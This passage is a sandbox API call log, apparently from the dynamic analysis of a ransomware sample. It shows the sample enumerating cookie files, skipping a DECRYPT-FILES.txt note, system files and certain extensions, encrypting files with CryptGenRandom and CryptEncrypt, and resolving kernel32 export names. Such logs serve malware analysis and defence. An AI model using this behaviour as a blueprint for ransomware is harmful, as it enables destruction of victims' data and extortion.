returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt.eRBU2tN" [0181.568] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0181.568] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt.eRBU2tN" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt.erbu2tn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0181.568] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=842) returned 1 [0181.569] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0181.569] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0181.589] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0181.589] CloseHandle (hObject=0x288) returned 1 [0181.589] CloseHandle (hObject=0x284) returned 1 [0181.589] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.589] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x52fcb4b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52fcb4b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xab60cb20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x16d, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@adtech[2].txt.W6sw", cAlternateFileName="5P5NRG~1.W6S")) returned 1 [0181.589] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adtech[2].txt.W6sw", lpString2="DECRYPT-FILES.txt") returned -1 [0181.589] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adtech[2].txt.W6sw", lpString2="autorun.inf") returned -1 [0181.589] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adtech[2].txt.W6sw", lpString2="boot.ini") returned -1 [0181.589] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adtech[2].txt.W6sw", lpString2="desktop.ini") returned -1 [0181.589] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adtech[2].txt.W6sw", lpString2="ntuser.dat") returned -1 [0181.589] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adtech[2].txt.W6sw", lpString2="iconcache.db") returned -1 [0181.589] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adtech[2].txt.W6sw", lpString2="bootsect.bak") returned -1 [0181.589] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adtech[2].txt.W6sw", lpString2="ntuser.dat.log") returned -1 [0181.589] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adtech[2].txt.W6sw", lpString2="thumbs.db") returned -1 [0181.589] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adtech[2].txt.W6sw", lpString2="Bootfont.bin") returned -1 [0181.589] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@adtech[2].txt.W6sw") returned 39 [0181.589] lstrcmpiW (lpString1="W6sw", lpString2="lnk") returned 1 [0181.589] lstrcmpiW (lpString1="W6sw", lpString2="exe") returned 1 [0181.589] lstrcmpiW (lpString1="W6sw", lpString2="sys") returned 1 [0181.589] lstrcmpiW (lpString1="W6sw", lpString2="dll") returned 1 [0181.590] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0181.590] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@adtech[2].txt.W6sw") returned 39 [0181.590] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0181.590] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@adtech[2].txt.W6sw" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtech[2].txt.W6sw") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtech[2].txt.W6sw" [0181.590] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0181.590] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtech[2].txt.W6sw" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adtech[2].txt.w6sw"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0181.590] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=365) returned 1 [0181.590] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0181.590] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0181.591] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0181.591] CloseHandle (hObject=0x288) returned 1 [0181.591] CloseHandle (hObject=0x284) returned 1 [0181.591] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.591] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x53c70990, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53c70990, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xab632c80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x15a, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@adtr02[1].txt.khk4R", cAlternateFileName="5P5NRG~1.KHK")) returned 1 [0181.591] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adtr02[1].txt.khk4R", lpString2="DECRYPT-FILES.txt") returned -1 [0181.591] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adtr02[1].txt.khk4R", lpString2="autorun.inf") returned -1 [0181.591] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adtr02[1].txt.khk4R", lpString2="boot.ini") returned -1 [0181.591] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adtr02[1].txt.khk4R", lpString2="desktop.ini") returned -1 [0181.591] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adtr02[1].txt.khk4R", lpString2="ntuser.dat") returned -1 [0181.591] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adtr02[1].txt.khk4R", lpString2="iconcache.db") returned -1 [0181.591] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adtr02[1].txt.khk4R", lpString2="bootsect.bak") returned -1 [0181.591] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adtr02[1].txt.khk4R", lpString2="ntuser.dat.log") returned -1 [0181.591] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adtr02[1].txt.khk4R", lpString2="thumbs.db") returned -1 [0181.591] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adtr02[1].txt.khk4R", lpString2="Bootfont.bin") returned -1 [0181.591] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@adtr02[1].txt.khk4R") returned 40 [0181.591] lstrcmpiW (lpString1="khk4R", lpString2="lnk") returned -1 [0181.591] lstrcmpiW (lpString1="khk4R", lpString2="exe") returned 1 [0181.591] lstrcmpiW (lpString1="khk4R", lpString2="sys") returned -1 [0181.591] lstrcmpiW (lpString1="khk4R", lpString2="dll") returned 1 [0181.591] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0181.591] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@adtr02[1].txt.khk4R") returned 40 [0181.591] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0181.592] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@adtr02[1].txt.khk4R" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt.khk4R") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt.khk4R" [0181.592] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0181.592] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt.khk4R" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt.khk4r"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0181.592] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=346) returned 1 [0181.592] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0181.592] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0181.593] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0181.593] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0181.593] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0181.593] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fd7a0*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fd7a0*=0x100) returned 1 [0181.594] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0181.594] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.594] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0181.594] CloseHandle (hObject=0x288) returned 1 [0181.595] SetFilePointerEx (in: hFile=0x284, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0181.595] WriteFile (in: hFile=0x284, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fd7c0, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fd7c0*=0x108, lpOverlapped=0x0) returned 1 [0181.595] CloseHandle (hObject=0x0) returned 0 [0181.596] CloseHandle (hObject=0x284) returned 1 [0181.596] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.596] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.596] GetTickCount () returned 0x1134caa [0181.596] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0181.596] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0181.596] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0181.597] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0181.597] lstrlenA (lpString="kernel32.dll") returned 12 [0181.597] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0181.597] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0181.597] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0181.597] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0181.597] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0181.597] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0181.597] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0181.597] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0181.597] lstrlenA (lpString="ADDATOMA") returned 8 [0181.597] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0181.597] lstrlenA (lpString="ADDATOMW") returned 8 [0181.597] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0181.597] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0181.597] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0181.597] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0181.597] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0181.597] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0181.597] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0181.597] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0181.597] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0181.598] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0181.598] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0181.598] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0181.598] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0181.598] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0181.598] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0181.598] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0181.598] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0181.598] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0181.598] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0181.598] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0181.598] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0181.598] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0181.598] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0181.598] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0181.598] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0181.598] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0181.598] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0181.598] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0181.598] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0181.598] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0181.598] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0181.598] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0181.598] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0181.598] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0181.598] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0181.598] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0181.598] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0181.598] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0181.598] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0181.598] lstrlenA (lpString="BACKUPREAD") returned 10 [0181.598] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0181.598] lstrlenA (lpString="BACKUPSEEK") returned 10 [0181.598] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0181.598] lstrlenA (lpString="BACKUPWRITE") returned 11 [0181.599] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0181.599] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0181.599] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0181.599] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0181.599] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0181.599] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0181.599] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0181.599] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0181.599] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0181.599] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0181.599] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0181.599] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0181.599] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0181.599] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0181.599] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0181.599] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0181.599] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0181.599] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0181.599] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0181.599] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0181.599] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0181.599] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0181.599] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0181.599] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0181.599] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0181.599] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0181.599] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0181.599] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0181.599] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0181.599] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0181.599] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0181.599] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0181.599] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0181.600] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0181.600] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0181.600] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0181.600] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0181.600] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0181.600] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0181.600] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0181.600] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0181.600] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0181.600] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0181.600] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0181.600] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0181.600] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0181.600] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0181.600] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0181.600] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0181.600] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0181.600] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0181.600] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0181.600] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0181.600] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0181.600] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0181.600] lstrlenA (lpString="BEEP") returned 4 [0181.600] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0181.600] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0181.600] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0181.600] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0181.600] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0181.600] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0181.600] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0181.600] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0181.600] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0181.600] 